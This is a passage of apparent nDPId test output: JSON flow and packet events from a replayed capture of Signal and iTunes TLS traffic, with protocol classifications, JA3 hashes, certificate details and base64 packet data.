ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} 
+00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"} 
